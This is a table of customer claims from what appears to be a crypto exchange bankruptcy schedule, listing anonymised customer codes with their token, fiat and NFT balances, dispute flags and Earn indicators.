| 07329692 | | CUSDT[1], DOGE[1031.58625986], USD[0.86] | | |
| 07329693 | | USD[10.00] | | |
| 07329694 | | USD[10.00] | | |
| 07329695 | | USD[10.00] | | |
| 07329696 | | USD[10.00] | | |
| 07329698 | | CUSDT[3], USD[0.00] | | |
| 07329699 | | USD[10.00] | | |
| 07329701 | | USD[10.00] | | |
| 07329702 | | BRZ[1], DOGE[0], ETH[0], NFT (304445528953540779/Hall of Fantasy League #9)[1], NFT (319109749073922151/Stay strong )[1], NFT (339695588654057219/Jon Snow)[1], NFT (360493143464736072/Boss man )[1], NFT (373371584976626993/Hall of Fantasy League #200)[1], NFT (387010393550496084/Powers )[1], NFT (413035300782645857/Abraham Lincoln Sketch #1)[1], NFT (441413169909493320/Hall of Fantasy League #199)[1], NFT (450106761941772599/Winter is Coming )[1], SHIB[1], TRX[0], USD[0.01] | Yes | |
| 07329704 | | DOGE[.64082303], TRX[1], USD[29.02] | | |
| 07329705 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329706 | | USD[10.00] | | |
| 07329707 | | USD[10.00] | | |
| 07329708 | | USD[10.00] | | |
| 07329709 | | USD[400.00] | | |
| 07329710 | | BTC[.317], DAI[.04881375], SOL[.00068958], USD[2.13], USDT[0] | | |
| 07329711 | | DOGE[182.58870615], USD[0.00] | | |
| 07329712 | | USD[10.00] | | |
| 07329713 | | DOGE[71.36611082], TRX[1], USD[5.22] | | |
| 07329714 | | USD[0.00] | | |
| 07329715 | | DOGE[543.35829099], USD[10.00] | | |
| 07329716 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[176.79] | | |
| 07329717 | | USD[10.00] | | |
| 07329718 | | USD[10.00] | | |
| 07329719 | | USD[10.00] | | |
| 07329720 | | USD[10.00] | | |
| 07329721 | | BTC[0], DOGE[853.2979241], USD[0.00], USDT[0] | | |
| 07329722 | | CUSDT[1], SHIB[2], USD[0.01] | | |
| 07329723 | | BTC[.00000093], DOGE[1], USD[0.01] | | |
| 07329724 | | USD[10.00] | | |
| 07329725 | | AUD[68.78], CUSDT[6], ETHW[.03360269], PAXG[.01307115], SHIB[4], USD[270.84] | Yes | |
| 07329726 | | DOGE[3.56696616], USD[0.00], USDT[0] | | |
| 07329727 | | BRZ[1], CUSDT[6], USD[0.01] | | |
| 07329728 | | DAI[0], DOGE[0], GRT[0.02874920], TRX[0], USD[0.00] | | |
| 07329729 | | USD[10.00] | | |
| 07329730 | | USD[10.00] | | |
| 07329731 | | BAT[3], CUSDT[4], LINK[17.47336693], TRX[5614.73649686], USD[0.00], USDT[0] | | |
| 07329732 | | USD[10.00] | | |
| 07329733 | | USD[10.00] | | |
| 07329734 | | USD[10.00] | | |
| 07329735 | | DOGE[1], USD[0.00] | | |
| 07329736 | | USD[10.00] | | |
| 07329737 | | USD[0.01] | | |
| 07329738 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07329739 | | USD[10.00] | | |
| 07329740 | | USD[0.00] | | |
| 07329741 | | BTC[.0002997], ETH[3.36648], ETHW[3.36648], SOL[.996], SUSHI[.4], USD[3.42] | | |
| 07329743 | | USD[10.00] | | |
| 07329745 | | DOGE[1646.11628980], ETH[0], ETHW[0], GRT[137.13326721], LTC[0], SHIB[865.17696399], USD[0.00] | Yes | |
| 07329746 | | USD[0.00] | | |
| 07329747 | | BTC[0] | | |
| 07329748 | | USD[10.00] | | |
| 07329749 | | USD[10.00] | | |
| 07329750 | | USD[0.01] | | |
| 07329751 | | USD[10.00] | | |
| 07329752 | | BAT[2], BRZ[6], CUSDT[2], DOGE[3], GRT[2], SHIB[1], TRX[9], USD[2055.60] | | |
| 07329753 | | USD[10.00] | | |
| 07329754 | | DOGE[10.28172721], USD[0.00] | | |
| 07329756 | | BRZ[2], CUSDT[2], DOGE[1], SOL[0], USD[0.00] | | |
| 07329757 | | USD[10.00] | | |
| 07329758 | | USD[10.00] | | |
| 07329759 | | CUSDT[1], DOGE[1], ETH[0], SHIB[151.62907919], USD[0.00] | Yes | |
| 07329760 | | USD[10.00] | | |
| 07329761 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07329762 | | USD[10.00] | | |
| 07329764 | | BTC[.00021184], USD[0.00] | | |
| 07329765 | | USD[10.00] | | |
| 07329766 | | USD[10.00] | | |
| 07329767 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329768 | | USD[0.00], USDT[0] | | |
| 07329769 | | USD[10.00] | | |
| 07329771 | | USD[10.00] | | |
| 07329772 | | CUSDT[3], DOGE[93.42138563], TRX[2], USD[0.71] | | |
| 07329774 | | BRZ[1], CUSDT[4], DOGE[2], USD[0.00], USDT[96.68520061] | | |
| 07329775 | | USD[10.00] | | |
| 07329776 | | CUSDT[1], USD[0.00] | | |
| 07329777 | | USD[10.00] | | |
| 07329778 | | CUSDT[4], TRX[4], USD[0.01] | | |
| 07329780 | | USD[10.00] | | |
| 07329781 | | USD[10.00] | | |
| 07329782 | | DOGE[243.41532516], USD[0.00] | | |
| 07329783 | | USD[10.00] | | |
| 07329784 | | DOGE[159.32366053], TRX[1], USD[0.00] | Yes | |
| 07329785 | | BTC[.00020906], USD[0.00] | | |
| 07329786 | | USD[10.00] | | |
| 07329787 | | CUSDT[3], USD[0.00] | | |
| 07329788 | | DOGE[143.34171977], USD[0.00] | | |
| 07329789 | | USD[0.00] | | |
| 07329790 | | USD[0.00] | Yes | |
| 07329791 | | USD[0.01] | | |
| 07329792 | | USD[10.00] | | |
| 07329793 | | BRZ[4], BTC[0], ETHW[0], GRT[1], SHIB[4], USD[0.07], USDT[0] | Yes | |
| 07329794 | | USD[0.01] | | |
| 07329795 | | BRZ[0], BTC[.02305758], DOGE[259649.10739636], ETH[.61451502], ETHW[.614296], USD[0.00], USDT[0] | Yes | |
| 07329796 | | USD[10.00] | | |
| 07329797 | | USD[10.00] | | |
| 07329798 | | USD[10.00] | | |
| 07329799 | | USD[10.00] | | |
| 07329800 | | USD[10.00] | | |
| 07329801 | | ETH[.06127362], ETHW[0], MATIC[0], SHIB[40939782.04853676], TRX[2], USD[318.99] | Yes | |
| 07329802 | | DOGE[1], LTC[.05199898], USD[0.00] | | |
| 07329803 | | USD[10.00] | | |
| 07329804 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07329805 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07329806 | | USD[10.00] | | |
| 07329807 | | USD[10.00] | | |
| 07329810 | | USD[1.79], USDT[0] | Yes | |
| 07329811 | | USD[10.00] | | |
| 07329812 | | USD[10.00] | | |
| 07329813 | | BRZ[4], CUSDT[3], DOGE[1], TRX[4], USD[0.00], USDT[1] | | |
| 07329814 | | USD[10.00] | | |
| 07329815 | | TRX[1], USD[0.00] | | |
| 07329816 | | BRZ[706.03795285], CUSDT[12], DOGE[618.22170096], LINK[4.76851236], TRX[594.86216328], USD[50.76] | | |
| 07329817 | | USD[10.00] | | |
| 07329818 | | USD[10.00] | | |
| 07329819 | | BTC[.00059221], DOGE[486.82796437], SHIB[6032627.8447621], TRX[177.02135917], USD[-21.25] | Yes | |
| 07329820 | | USD[10.00] | | |
| 07329821 | | USD[10.00] | | |
| 07329822 | | USD[10.00] | | |
| 07329823 | | USD[10.00] | | |
| 07329824 | | USD[10.00] | | |
| 07329825 | | DOGE[1], USD[26.61] | | |
| 07329827 | | USD[0.00] | | |
| 07329829 | | CUSDT[1], DOGE[0], USD[33.84] | | |
| 07329830 | | BTC[.03744253], CUSDT[1], DOGE[1.07787985], ETH[.11324191], ETHW[.11212648], GRT[222.91498305], LINK[6.86799794], SHIB[3], SOL[8.95125235], TRX[4], UNI[6.70536252], USD[0.00] | Yes | |
| 07329833 | | DOGE[41.84045273], USD[0.00] | | |
| 07329834 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329835 | | BRZ[1], CUSDT[1], DOGE[1239.52238361], USD[0.00] | | |
| 07329836 | | GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07329837 | | CUSDT[1], USD[0.00] | | |
| 07329838 | | CUSDT[2], USD[0.13] | | |
| 07329839 | | USD[0.00] | | |
| 07329840 | | USD[10.00] | | |
| 07329841 | | USD[10.00] | | |
| 07329842 | | CUSDT[1], USD[0.01] | | |
| 07329843 | | DOGE[.688], USD[0.88] | | |
| 07329844 | | GRT[5.46557541], NFT (329571656112944251/Entrance Voucher #1740)[1], USD[0.00] | Yes | |
| 07329845 | | USD[10.00] | | |
| 07329846 | | DOGE[191.34044948], TRX[1], USD[0.00] | Yes | |
| 07329847 | | BAT[344.25064921], BCH[.37199535], BTC[.00030019], CUSDT[2], DOGE[233.8615855], GRT[15.55562158], LINK[4.52395244], LTC[.81367925], SOL[2.83023203], SUSHI[8.2624168], TRX[354.35870624], USD[11.10], YFI[.00032395] | Yes | |
| 07329848 | | USD[110.00] | | |
| 07329849 | | USD[10.00] | | |
| 07329850 | | USD[10.00] | | |
| 07329851 | | ETH[.00000035], ETHW[.00000035], USD[0.37] | Yes | |
| 07329852 | | USD[10.00] | | |
| 07329853 | | CUSDT[2], USD[166.38] | | |
| 07329854 | | USD[10.00] | | |
| 07329855 | | USD[10.00] | | |
| 07329856 | | CUSDT[1], DOGE[1], USD[0.17] | | |
| 07329857 | | USD[0.00] | | |
| 07329858 | | DOGE[.01867803], TRX[1], USD[0.83] | | |
| 07329859 | | DOGE[1], USD[0.00] | | |
| 07329860 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07329861 | | USD[10.00] | | |
| 07329862 | | USD[0.00] | | |
| 07329863 | | BRZ[3], CUSDT[5], TRX[6], USD[0.00], USDT[1] | | |
| 07329864 | | CUSDT[2], DOGE[285.55607977], USD[0.00] | | |
| 07329865 | | CUSDT[1], USD[0.01] | | |
| 07329866 | | USD[10.00] | | |
| 07329867 | | DAI[0], SOL[0.04201800], USD[0.00] | Yes | |
| 07329869 | | USD[0.01] | | |
| 07329870 | | ETH[.00000811], ETHW[.00000811], USD[0.00] | Yes | |
| 07329871 | | USD[10.00] | | |
| 07329873 | | BTC[.00063422], CUSDT[14], DOGE[1], MATIC[10.43817093], SHIB[9509.44964573], SOL[.07539328], TRX[2], USD[0.00] | Yes | |
| 07329874 | | BTC[.00020796], USD[0.00] | | |
| 07329875 | | USD[10.00] | | |
| 07329876 | | CUSDT[2], DOGE[19035.09639605], GRT[1], LINK[15.48036763], TRX[2], USD[1253.38] | | |
| 07329877 | | USD[10.00] | | |
| 07329878 | | USD[10.00] | | |
| 07329879 | | USD[10.00] | | |
| 07329880 | | USD[10.00] | | |
| 07329881 | | USD[10.00] | | |
| 07329882 | | USD[10.00] | | |
| 07329885 | | AVAX[8.06609483], BRZ[1], BTC[.00628192], DAI[.00093042], DOGE[2], ETH[.16711599], ETHW[.16676708], MATIC[350.40809221], NEAR[12.3727439], SHIB[9], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07329886 | | BTC[0.00005628], ETH[.00035806], EUR[0.00], NEAR[2.23379893], NFT (516987636609741271/Black@ Community Token)[1], SHIB[3], SOL[0], TRX[1], USD[-2.88], USDT[0] | Yes | |
| 07329888 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07329889 | | BRZ[1], CUSDT[4], TRX[1], USD[0.05] | | |
| 07329890 | | USD[10.00] | | |
| 07329891 | | ETH[.00008647], ETHW[0.00008647], USD[0.00] | Yes | |
| 07329892 | | USD[10.00] | | |
| 07329895 | | BAT[129.71927714], BRZ[2], CUSDT[6.57502918], DOGE[887.95215593], GRT[14.68531796], SHIB[414.06163708], SOL[2.23108953], TRX[167.78067757], USD[0.00], USDT[1.08815501] | Yes | |
| 07329896 | | DOGE[1], USD[0.00], USDT[1] | | |
| 07329897 | | USD[10.00] | | |
| 07329898 | | USD[10.00] | | |
| 07329899 | | CUSDT[1], DOGE[2], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329900 | | USD[10.00] | | |
| 07329901 | | CUSDT[3], TRX[2], USD[0.00] | | |
| 07329902 | | USD[10.00] | | |
| 07329903 | | BRZ[1], DOGE[2], SOL[0], USD[0.01] | | |
| 07329904 | | CUSDT[4], GRT[1], TRX[2], USD[0.01] | | |
| 07329906 | | BRZ[1], CUSDT[8], DOGE[2], SOL[1.45819660], TRX[271.63563447], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07329907 | | DOGE[1], USD[0.00] | | |
| 07329908 | | BRZ[1], CUSDT[1], DOGE[.74703748], GRT[210.50494346], TRX[8765.9346561], USD[0.00] | | |
| 07329909 | | DOGE[36.07142632], USD[0.00] | | |
| 07329910 | | BRZ[1], CUSDT[3], TRX[1], USD[0.01], USDT[1] | | |
| 07329911 | | BTC[0.00179563], ETH[0], ETHW[0], SOL[0], USD[0.00] | | |
| 07329912 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07329913 | | USD[10.00] | | |
| 07329914 | | SHIB[1000], USD[42.74] | Yes | |
| 07329915 | | USD[10.00] | | |
| 07329916 | | DOGE[1], USD[20.47] | | |
| 07329917 | | USD[10.00] | | |
| 07329918 | | CUSDT[1], USD[0.08] | | |
| 07329919 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], EUR[0.00], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07329920 | | USD[10.00] | | |
| 07329921 | | CUSDT[1], USD[0.01] | Yes | |
| 07329922 | | USD[10.00] | | |
| 07329923 | | CUSDT[2], DOGE[321.14589936], TRX[1], USD[0.00] | | |
| 07329924 | | USD[10.00] | | |
| 07329925 | | USD[10.00] | | |
| 07329926 | | BTC[.00070106], DOGE[2], UNI[0], USD[0.00] | | |
| 07329927 | | USD[10.00] | | |
| 07329928 | | BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SHIB[1], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07329929 | | CUSDT[256.10364691], DOGE[.0000458], USD[0.01] | Yes | |
| 07329930 | | BRZ[1], BTC[.00137393], CUSDT[2], ETH[0], ETHW[0], TRX[2], USD[0.00] | Yes | |
| 07329931 | | USD[10.00] | | |
| 07329932 | | BAT[1], BTC[1.08656943], DOGE[143412.39215208], ETH[3.15606611], ETHW[3.15511924], LINK[78.93938261], LTC[11.61252141], SHIB[272282512.70647278], SOL[94.45871392], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07329933 | | BRZ[0], DOGE[0], SHIB[26293.96836355], SOL[0], USD[307.93], USDT[0] | Yes | |
| 07329934 | | USD[10.00] | | |
| 07329935 | | BAT[1.0165555], TRX[3], USD[0.00] | Yes | |
| 07329937 | | CUSDT[7], DOGE[3], TRX[3], USD[0.01] | | |
| 07329938 | | USD[0.00] | Yes | |
| 07329939 | | BTC[0], DOGE[0.96400000], SHIB[3200000], USD[3.41] | | |
| 07329940 | | USD[10.00] | | |
| 07329941 | Contingent, Disputed | USD[10.00] | | |
| 07329942 | | USD[10.00] | | |
| 07329943 | | USD[10.00] | | |
| 07329945 | | USD[10.00] | | |
| 07329946 | | USD[0.00] | | |
| 07329947 | | CUSDT[1], TRX[3], USD[0.06] | | |
| 07329948 | | CUSDT[1], DOGE[.0639061], USD[0.00] | | |
| 07329949 | | USD[10.00] | | |
| 07329950 | | USD[10.00] | | |
| 07329951 | | USD[10.00] | | |
| 07329952 | | TRX[1], USD[0.00] | | |
| 07329953 | | BTC[0], USD[0.00] | | |
| 07329954 | | USD[10.00] | | |
| 07329955 | | USD[10.00] | | |
| 07329956 | | USD[10.00] | | |
| 07329957 | | CUSDT[1], DOGE[621.08494002], USD[0.00] | | |
| 07329959 | | CUSDT[3], DOGE[1], GRT[60.94586536], USD[0.01] | | |
| 07329960 | | USD[10.00] | | |
| 07329961 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07329962 | | USD[10.00] | | |
| 07329963 | | DOGE[1], USD[0.00] | | |
| 07329964 | | BRZ[1], CUSDT[1], SHIB[269216.23758244], TRX[1], USD[0.00] | | |
| 07329965 | | USD[10.00] | | |
| 07329966 | | BRZ[0.00000008], ETH[0], GRT[0.26970223], USD[0.00] | | |
| 07329967 | | CUSDT[3], DOGE[475.77696179], ETH[0.13680527], ETHW[0.13680527], TRX[1], USD[0.00] | | |
| 07329968 | | USDT[0.00001065] | | |
| 07329969 | | USD[10.00] | | |
| 07329970 | | BRZ[12], CUSDT[8], DOGE[1], GRT[2], TRX[2], USD[0.01], USDT[4.00000001] | | |
| 07329971 | | BTC[.00103085], CUSDT[3], DOGE[2], ETH[.01266075], ETHW[.01266075], UNI[.00005376], USD[0.00] | | |
| 07329973 | | DOGE[3.000548], USD[0.00] | Yes | |
| 07329974 | | USD[10.00] | | |
| 07329977 | | USD[10.00] | | |
| 07329978 | | DOGE[0], USD[0.00] | | |
| 07329979 | | CUSDT[1], USD[0.01] | | |
| 07329980 | | USD[10.00] | | |
| 07329981 | | CUSDT[2], DOGE[21.45973193], USD[0.00] | | |
| 07329982 | | USD[10.00] | | |
| 07329984 | | USD[11.06] | Yes | |
| 07329986 | | USD[2.24] | Yes | |
| 07329987 | | CUSDT[2], TRX[1], USD[10.00] | | |
| 07329988 | | ETH[.23305928], ETHW[.23285693], GRT[.0009384], SHIB[16.02378755], TRX[.00929218], USD[0.00] | Yes | |
| 07329989 | | BRZ[1], CUSDT[1], DOGE[6687.70169987], ETH[.04718418], ETHW[.04718418], SHIB[2], USD[0.01] | | |
| 07329990 | | DOGE[152.0781633], USD[0.00] | | |
| 07329991 | | BRZ[3], CUSDT[12], DOGE[1], GRT[1.00498957], TRX[6], USD[0.00] | Yes | |
| 07329992 | | DOGE[500] | | |
| 07329993 | | USD[10.00] | | |
| 07329994 | | USD[10.00] | | |
| 07329996 | | USD[0.01] | | |
| 07329998 | | USD[0.02], USDT[.006967] | | |
| 07329999 | | USD[10.00] | | |
| 07330000 | | USD[10.00] | | |
| 07330001 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07330002 | | DOGE[418.8879592], USD[0.00] | | |
| 07330003 | | USD[10.00] | | |
| 07330004 | | BTC[.0000468], CUSDT[3], DOGE[17.45515099], TRX[1], USD[3.90] | | |
| 07330005 | | USD[0.00], USDT[0] | Yes | |
| 07330006 | | USD[10.00] | | |
| 07330008 | | DOGE[138.64043367], USD[0.00] | | |
| 07330009 | | BRZ[2], CUSDT[5], DOGE[13979.57962225], ETH[.07623859], ETHW[.07529342], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07330010 | | BTC[0], USD[0.00] | Yes | |
| 07330011 | | GRT[1], TRX[1], USD[0.01] | | |
| 07330012 | | CUSDT[8], LINK[.00849775], SHIB[7], TRX[3], USD[0.00] | | |
| 07330013 | | SHIB[162675.04555698], USD[0.00] | Yes | |
| 07330014 | | USD[10.00] | | |
| 07330015 | | USD[10.00] | | |
| 07330016 | | BAT[1], BRZ[3], CUSDT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07330017 | | USD[10.00] | | |
| 07330018 | | DOGE[.00129163], TRX[1], USD[0.00] | | |
| 07330019 | | USD[10.00] | | |
| 07330021 | | DOGE[1], USD[0.45], USDT[0] | | |
| 07330022 | | CUSDT[3], DOGE[84.52370979], USD[0.01] | Yes | |
| 07330023 | | USD[10.00] | | |
| 07330024 | | CUSDT[2], DOGE[.00252414], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07330025 | | GRT[8.85121551], USD[0.00] | | |
| 07330026 | | USD[10.00] | | |
| 07330027 | | BRZ[1], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07330028 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330029 | | USD[10.00] | | |
| 07330030 | | USD[10.00] | | |
| 07330031 | | USD[10.00] | | |
| 07330032 | | CUSDT[1], DOGE[2], UNI[.00001249], USD[0.00] | Yes | |
| 07330033 | | USD[10.00] | | |
| 07330034 | | BRZ[4], CUSDT[63.93716854], DOGE[1], USD[0.00], USDT[0] | | |
| 07330036 | | NFT (330347723425173728/Cosmic Creations #83)[1], NFT (400442118837444207/Spectra #424)[1], NFT (408042499154775069/Golden Hill #44)[1], NFT (512061583513982155/Ferris From Afar #769)[1], NFT (550304463487493947/Vintage Sahara #904)[1], USD[2200.00] | | |
| 07330037 | | USD[10.00] | | |
| 07330038 | | USD[0.07] | | |
| 07330040 | | CUSDT[2], DOGE[0], LINK[1.34790730], USD[0.00] | | |
| 07330042 | | LTC[0], USD[0.05] | Yes | |
| 07330043 | | BAT[3], BRZ[6], CUSDT[8], DOGE[1091156.83133881], GRT[1], LTC[22.81265662], TRX[20], USD[0.00], USDT[4] | | |
| 07330044 | | DOGE[159.95892254], USD[0.00] | | |
| 07330045 | | USD[10.00] | | |
| 07330046 | | DOGE[0], USD[0.00] | | |
| 07330047 | | BTC[.00003003], CUSDT[1], USD[0.00] | | |
| 07330048 | | BTC[.00000035], CUSDT[3], DOGE[.0004799], USD[0.22] | | |
| 07330049 | | DOGE[0], USD[0.00] | | |
| 07330050 | | USD[10.00] | | |
| 07330052 | | USD[10.00] | | |
| 07330053 | | USD[10.00] | | |
| 07330054 | | DOGE[.00000137], SHIB[1], USD[53.61] | Yes | |
| 07330055 | | USD[10.00] | | |
| 07330057 | | BTC[0], ETH[.00000001], USD[0.00], USDT[1.55868047] | Yes | |
| 07330058 | | USD[10.00] | | |
| 07330059 | | USD[0.00] | | |
| 07330060 | | BTC[.00001174] | | |
| 07330061 | | USD[10.00] | | |
| 07330062 | | USD[0.10] | | |
| 07330063 | | USD[10.00] | | |
| 07330064 | | USD[10.00] | | |
| 07330065 | Contingent, Disputed | USD[10.00] | | |
| 07330066 | | USD[0.00] | | |
| 07330068 | | USD[60.01] | | |
| 07330069 | | USD[10.91] | Yes | |
| 07330070 | | CUSDT[1], DOGE[123.51889267], USD[0.01] | | |
| 07330071 | | USD[0.35] | | |
| 07330072 | | CUSDT[1], DOGE[2.58129984], ETH[.00242324], ETHW[.00242324], USD[0.78] | | |
| 07330074 | | CUSDT[8], DOGE[1], SHIB[27205.43307084], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07330075 | | USD[0.00] | Yes | |
| 07330076 | | CUSDT[4], TRX[1], USD[0.01] | Yes | |
| 07330077 | | DOGE[1.05965999], USD[0.00] | | |
| 07330078 | | USD[10.00] | | |
| 07330079 | | BRZ[1], CUSDT[3], DOGE[7503.37067732], SHIB[1472213.44366545], USD[0.00] | Yes | |
| 07330080 | | BCH[.09579419], BRZ[9.8695445], BTC[.03708542], CUSDT[335.62819955], DOGE[7980.36013948], ETH[.60383031], ETHW[.60357685], LINK[7.39808517], LTC[1.63395902], MATIC[598.08769387], NFT (347290316724861200/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #36)[1], NFT (502274146153557807/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #11)[1], SHIB[26120646.19547753], SOL[25.63945442], SUSHI[43.14704458], TRX[58.96972052], UNI[15.2702674], USD[5.99], USDT[1.06619918], YFI[.00739853] | Yes | |
| 07330081 | | USD[10.00] | | |
| 07330084 | | USD[10.00] | | |
| 07330085 | | BRZ[1], CUSDT[3], TRX[.94691863], USD[0.01] | | |
| 07330086 | | SHIB[1], USD[39.38] | Yes | |
| 07330087 | | USD[10.00] | | |
| 07330088 | | USD[0.00], USDT[0] | | |
| 07330089 | | USD[0.01], USDT[0.00000001] | Yes | |
| 07330090 | | USD[10.00] | | |
| 07330091 | | USD[10.00] | | |
| 07330092 | | USD[10.00] | | |
| 07330093 | | CUSDT[2], DOGE[191.31645589], ETH[.20595555], ETHW[.20595555], GRT[1], LTC[10.70221418], TRX[1], USD[0.66] | | |

Amended Schedule F-12: priority Customer Claim

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330095 | | DOGE[.00003725], USD[0.01] | Yes | |
| 07330097 | | USD[10.00] | | |
| 07330098 | | USD[0.15], USDT[0] | Yes | |
| 07330099 | | USD[10.00] | | |
| 07330100 | | AVAX[.00002677], BAT[.00222001], BCH[.00000664], BRZ[2], BTC[0.00000002], DOGE[4], GRT[1], LTC[.00001189], MKR[.00000124], NEAR[.00013864], SHIB[16], TRX[2], USD[0.01], USDT[0] | | |
| 07330101 | | USD[10.00] | | |
| 07330102 | | USD[10.00] | | |
| 07330103 | | DOGE[.816], USD[0.18] | | |
| 07330104 | | USD[0.01] | | |
| 07330105 | | CUSDT[21], DOGE[0], ETH[0], GRT[43.52901242], SHIB[1], TRX[.16309137], USD[0.01] | Yes | |
| 07330106 | | USD[10.00] | | |
| 07330107 | | USD[11.00] | Yes | |
| 07330108 | | USD[10.00] | | |
| 07330109 | | USD[10.00] | | |
| 07330112 | | USD[10.00] | | |
| 07330114 | | USD[10.00] | | |
| 07330115 | | CUSDT[2], DOGE[754.15162606], TRX[3], USD[0.01] | Yes | |
| 07330116 | | USD[10.00] | | |
| 07330118 | | USD[10.00] | | |
| 07330119 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07330120 | | USD[10.00] | | |
| 07330121 | | USD[10.00] | | |
| 07330122 | | USD[10.00] | | |
| 07330123 | | DOGE[.41455053], USD[0.24] | | |
| 07330124 | | USD[10.00] | | |
| 07330125 | | BAT[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07330126 | | CUSDT[7], DOGE[52.77248773], USD[0.03] | | |
| 07330127 | | USD[10.00] | | |
| 07330128 | | DOGE[62.63679615], USD[10.00] | | |
| 07330130 | | USD[10.00] | | |
| 07330131 | | USD[0.00], USDT[0] | | |
| 07330132 | | BTC[.00021203], TRX[3], USD[0.01] | Yes | |
| 07330133 | | BRZ[1], BTC[0], CUSDT[4], USD[0.00] | | |
| 07330134 | Contingent, Disputed | USD[0.00] | Yes | |
| 07330135 | | USD[10.00] | | |
| 07330136 | | BAT[5.89747819], BCH[0], BRZ[0], BTC[0.00010033], DOGE[9.88689022], ETH[0.00521784], ETHW[0], SOL[1.00872369], TRX[0], USD[0.00] | Yes | |
| 07330137 | | USD[10.00] | | |
| 07330138 | | CUSDT[2], DOGE[79.67245161], USD[4.29] | | |
| 07330139 | | BAT[1], TRX[1], USD[10.00] | | |
| 07330140 | | USD[10.00] | | |
| 07330141 | | BRZ[1], CUSDT[1], DOGE[1551.49903567], TRX[2], USD[2.98] | | |
| 07330142 | | USD[10.00] | | |
| 07330143 | | USD[10.00] | | |
| 07330144 | | USD[10.00] | | |
| 07330145 | | BRZ[2], CUSDT[2], DOGE[1125.27713511], GRT[.91430772], TRX[380.70197845], USD[0.00] | | |
| 07330146 | | CUSDT[1], DOGE[1.00004898], TRX[105.56089449], USD[0.00] | | |
| 07330147 | | USD[10.00] | | |
| 07330148 | | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], MATIC[0], NFT (31785794843184349/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #88)[1], NFT (324317366225676659/Shelly 2)[1], NFT (333574801951754103/Lady in Red)[1], NFT (412098759891034343/Big Ben)[1], NFT (475681338508510940/NS Dino 5 #2)[1], NFT (573557818083576124/Skull face #1 of 2)[1], SHIB[1], SOL[0.00082393], SUSHI[0], TRX[0], UNI[0], USD[21.89], USDT[0], YFI[0] | Yes | |
| 07330149 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07330150 | | USD[0.00], USDT[0] | | |
| 07330151 | | USD[10.00] | | |
| 07330152 | | USD[10.00] | | |
| 07330154 | Contingent, Disputed | USD[0.01] | | |
| 07330156 | | BRZ[2], BTC[0.00021803], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07330157 | | USD[10.00] | | |
| 07330158 | | BTC[0], CUSDT[1], DOGE[0], USD[0.00] | Yes | |
| 07330159 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07330160 | | USD[10.00] | | |
| 07330161 | | DOGE[.00288198], SHIB[12], USD[0.00] | Yes | |
| 07330162 | | USD[10.00] | | |
| 07330163 | | USD[10.00] | | |
| 07330164 | | DOGE[1], SUSHI[11.36086115], USD[10.00] | | |
| 07330165 | | BRZ[1], DOGE[.19678637], GRT[1], TRX[2], USD[0.41] | | |
| 07330166 | | BTC[0.00076841], DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07330167 | | USD[10.00] | | |
| 07330169 | | DOGE[0], ETH[0], LINK[0], SOL[0.21669183], USD[0.00] | Yes | |
